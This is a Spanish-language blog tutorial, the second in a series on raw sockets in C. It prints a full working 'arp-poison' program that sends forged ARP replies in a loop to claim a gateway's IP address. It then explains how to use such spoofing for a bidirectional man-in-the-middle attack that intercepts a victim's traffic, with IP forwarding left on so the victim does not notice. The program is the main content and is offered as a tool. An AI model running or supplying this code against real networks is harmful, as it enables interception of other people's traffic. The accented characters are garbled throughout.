Thursday, September 7, 2017

En crudo y sin censura RAW SOCKETS II en C

En crudo y sin censura RAW SOCKETS II en C


�Qu� tal! Ya estoy aqu� con la segunda entrada de esta serie, que me da a mi que va a ser larga... ;D
Bueno como promet� en la entrada anterior vamos a ver el ejemplo que os dej�, vamos a ver las partes importantes de Sockets Raw, y a�adiremos o modificaremos el c�digo para conseguir un ejemplo m�s vers�til...

Al lector: si incurro en cualquier error a lo largo de estos post agradecer�a vuestras correcciones.

Como primer ejercicio quiero que le ech�is un vistazo m�s a fondo al c�digo que est� debajo de este p�rrafo, y le�is los comentarios donde a grandes rasgos explico el funcionamiento del ejemplo que os dej� la semana pasada, si no entend�is nada (nadie dijo que programar para sockets fuera a ser f�cil), no agobiarse, basta con echarle un ojo para que cuando explique la teor�a os suene por donde cae en el c�digo:

#include <stdio.h>//libreria estandar
#include <stdlib.h>//libreria estandar
#include <unistd.h>// close(sock)
#include <string.h>//biblioteca standar
#include <netinet/if_ether.h> //estructuras ethernet arp headers
#include <net/if.h>// sockets interfaces locales
#include <sys/socket.h> // encabezado de sockets principales
#include <arpa/inet.h>//definiciones de las operaciones de Internet
#include <netpacket/packet.h>// struct sockaddr_ll
#include <net/ethernet.h>//id protos ethernet
#include <signal.h> //signal(SIGINT, cleanup);

#define IP4LEN 4 //define la
#define PKTLEN sizeof(struct ether_header) + sizeof(struct ether_arp)
int sock;

void usage() { //funcion para mostrar el help del programa por pantalla
puts("usage: ./arp-poison <interface> <gateway ip> <mac addr>");
puts("ex: ./arp-poison eth0 10.1.1.1 aa:bb:cc:dd:ee:ff");
exit(1);
}

void cleanup() { //utilizaremos esta funcion para cerrar el socket
close(sock); //mediante la funcion close() de <unistd.h>
exit(0); //la funcion no retornara valor alguno
}

main(int argc, char ** argv) {
char packet[PKTLEN]; //definimos la longitud del paquete a la suma del la cabecera ETHERNET+ARP
struct ether_header * eth = (struct ether_header *) packet; //declaramos la variable eth y la apuntamos
//a struct ether_headder del paquete (<netinet/if_ether.h>)

struct ether_arp * arp = (struct ether_arp *) (packet + sizeof (struct ether_header)); //igual que el anteriot pero
//ether_arp para poder meter
//mas tarde valores.
struct sockaddr_ll device; //<netpacket/packet.h> hacemos que int sll_ifindex;apunte a nuestra variable device

if (argc < 4) {//si los argumento pasados para lanzar el programa
usage();
}//son inferiores a 4 lanzamos la funcion usage()mostrando asi la ayuda

sock = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP)); //declaramos el socket con su familia,
//tipo raw,protocolo. htons()convierte el entero corto sin signo hostshort desde el orden de bytes del host al de la red.

if (sock < 0) //si no se crea el shocket llamamos a exit()
perror("socket"), exit(1);
signal(SIGINT, cleanup);
//RELLENAMOS LAS ESTRUCTURAS
//recogemos la mac del argumento 3 (hexadecimal)
//y se l pasamos a la structura ARP concretamente arp_sha[ETH_ALEN];/* sender hardware address */
// de la libreria <netinet/if_ether.h> sin signo
sscanf(argv[3], "%x:%x:%x:%x:%x:%x", (unsigned int *) &arp->arp_sha[0],
(unsigned int *) &arp->arp_sha[1],
(unsigned int *) &arp->arp_sha[2],
(unsigned int *) &arp->arp_sha[3],
(unsigned int *) &arp->arp_sha[4],
(unsigned int *) &arp->arp_sha[5]);

//recogemos la ip pasada en el argumento 2 (decimal) a arp_spa <netinet/if_ether.h> entero
sscanf(argv[2], "%d.%d.%d.%d",(int *) &arp->arp_spa[0],
(int *) &arp->arp_spa[1],
(int *) &arp->arp_spa[2],
(int *) &arp->arp_spa[3]);
///////
memset(eth->ether_dhost, 0xff, ETH_ALEN);//bcast destination eth address */>/a la structura ethernet
memcpy(eth->ether_shost, arp->arp_sha, ETH_ALEN);//* "source ether addr" a structura etherne y a" hardware address" struc_arp
eth->ether_type = htons(ETH_P_ARP);
//pasamos el al heather ethernet el valor ETH_P_ARR
//de if_ether.h " ETH_P_ARP 0x080 Address Resolution packet */"
arp->ea_hdr.ar_hrd = htons(ARPHRD_ETHER);
arp->ea_hdr.ar_pro = htons(ETH_P_IP);
arp->ea_hdr.ar_hln = ETH_ALEN;
arp->ea_hdr.ar_pln = IP4LEN;
arp->ea_hdr.ar_op = htons(ARPOP_REPLY);
memset(arp->arp_tha, 0xff, ETH_ALEN);
memset(arp->arp_tpa, 0x00, IP4LEN);
memset(&device, 0, sizeof(device));
device.sll_ifindex = if_nametoindex(argv[1]);
device.sll_family = AF_PACKET;
memcpy(device.sll_addr, arp->arp_sha, ETH_ALEN);
device.sll_halen = htons(ETH_ALEN);

puts("press ctrl+c to exit.");
while (1) {
printf("%s: %s is at %s ", argv[1], argv[2], argv[3]);
sendto(sock, packet, PKTLEN, 0, (struct sockaddr *) &device, sizeof(device));//mandamos los paquetes
sleep(2);
}
return 0;
}

Se que promet� no ponerme en rollo t�cnico, pero para empezar con sockets al menos nos deben sonar un par de conceptos cr�ticos... intentar� ser lo mas simple y conciso que pueda...

Encapsulaci�n de datos:

"En redes de ordenadores, encapsulaci�n es un m�todo de dise�o modular de protocolos de comunicaci�n en el cual las funciones l�gicas de una red son abstra�das ocultando informaci�n a las capas de nivel superior".

En cristiano: Las redes se trabajan en capas, donde cada una de ellas es responsable de una funci�n espec�fica dentro del proceso de env�o/recepci�n de datos desde un host a otro. Normalmente se trabaja con el modelo OSI y TCP/IP.


Para operar dentro de estas capas existen diferentes protocolos. Y para ir de una capa a otra necesitamos encapsular los paquetes hasta hacer llegar nuestro paquete al sitio deseado.


Un buen s�mil de esto es mandar una carta a un amigo que vive en otro continente; escribes la carta, luego va a el cartero, despu�s al cami�n, que la lleva al avi�n...
Cuando llegue tu carta para que la coja tu amigo debe salir del avi�n, ir a otro cami�n y cogerla otro cartero que se la entregar� a tu amigo.

En el proceso de viaje del paquete por las distintas capas del modelo TCP, los encargados de transportarlas son los protocolos y estos necesitan de unas cabeceras donde se le indique que transportan y donde lo transportan (entre otros datos).

En el caso de SOCK_DGRAM y SOCK_STREAM este trabajo lo lleva a cabo el Kernel, pero amigos, en el caso que nos ocupa SOCK_RAW y como vimos en la entrada anterior "Los campos del Header los deberemos rellenar manualmente, al contrario que si trabaj�semos con otro tipo de socket; el kernel no rellena las cabeceras".

Para hacer esto c�modamente utilizaremos las Estructuras.

�QU� SON LAS ESTRUCTURAS?

Resumi�ndolo un poco: "Las estructuras son colecciones de variables relacionadas bajo un nombre. Las estructuras pueden contener variables de muchos tipos diferentes de datos a diferencia de los arreglos que contienen �nicamente elementos de un mismo tipo de datos".

Para ver esto mucho mas claro vamos a recurrir a nuestro ejemplo examinando un fragmento donde rellenamos las estructura ya programada que utilizamos de las librer�as incluidas en el c�digo:

En nuestro ejemplo, vamos a mandar una trama ARP por la capa de enlace,
el encargado de esto es el protocolo ETHERNET. Para conseguir esto necesitamos la estructura de los Headers ethernet, y la estructura del  paquete arp.

Aqu� apuntamos como variable eth a la estructura que contiene los headers ethernet en la librer�a <ethernet.h>

 y ahora con:


Le decimos el tipo de paquete que va a ser ADDRESS RESOLUTION PACKET.
que lo hemos sacado de if_ether.h convirti�ndolo con htons (la funci�n htons convierte a u_short del host en orden de bytes de red TCP / IP si fuese necesario):







Aqu� pasamos el tercer par�metro introducido al arrancar el programa(la mac):

A la Estructura ether_arp alojada en <if_ether.h>


Espero que no os est� liando mucho... solo ten�is que quedaros con que las estructuras son una colecci�n de datos, que podemos encontrarlas en las librer�as ya preconcebidas para crear paquetes <netinet.h> y c�mo sacar y meter datos en ellas. ya veremos esto m�s despacio.

�Menuda chapa! vamos a asimilarla con la pr�ctica.

Vamos a dejar por el momento las comederas de cabeza hasta la tercera entrada, y vamos con lo divertido.

Construyendo nuestra primer herramienta

Dije que convertir�amos el c�digo del ejemplo en algo m�s funcional y divertido, vamos hacer una herramienta que nos permita hacer un Man In The Middle.

Si estas leyendo esta entrada supongo que sabras que es un MITM y en que consiste un ataque de falsificaci�n ARP o ARP Spoofing, pero vamos a recordarlo a grandes rasgos.

El principio del ARP Spoofing es enviar mensajes ARP falsos (falsificados o spoofed) a la Ethernet. Normalmente la finalidad es asociar la direcci�n MAC del atacante con la direcci�n IP de otro nodo (el nodo atacado), como por ejemplo la puerta de enlace predeterminada (gateway).

Esta t�cnica de arp spoofing, si se hace de manera bidireccional obtenemos el resultado de un ataque man in the middle.

Es decir el atacante le dice ala red (todos los equipos) o a la v�ctima (ataque dirigido)  que es el gateway . El medio del ataque es el envenenamiento de las tablas ARP de los equipos.

Vamos a establecer el escenario:

Supongamos que se da la siguiente situaci�n:

Queremos poder capturar el tr�fico que manda la v�ctima hacia INet... y lo m�s natural ser�a colocarnos en medio; de ah� lo de MITM...

�C�mo conseguimos esto?: mediante paquetes ARP-Reply, en primer lugar a la v�ctima le decimos que somos el router mand�ndole un ARP-reply y diciendo que a nuestra mac le corresponde la ip del router.
El protocolo ARP, al carecer de mecanismos de autentificacion y si en el equipo no se ha establecido unas tablas ARP fijas, actualizara la la tabla ARP de la victima con la nueva informaci�n...en lo que respeta a el equipo v�ctima somos el router.

El siguiente paso ser� mandar un paquete ARP-reply al router dici�ndole que somos la v�ctima, el protocolo ARP modificar� la tabla Arp del router como hizo con la victima. Podremos interceptar la informaci�n bi-direccionalmente, siempre de manera transparente para la victima siempre y cuando tengamos activado el IP forward en nuestro equipo (echo 1 > /proc/sys/net/ipv4/ip_forward).

Y �c�mo podemos manipular los paquetes ARP? pues chatos: con SOCK_RAW!

Pero esto ser� en la siguiente entrada..

Un saludo

    Manuel


download file now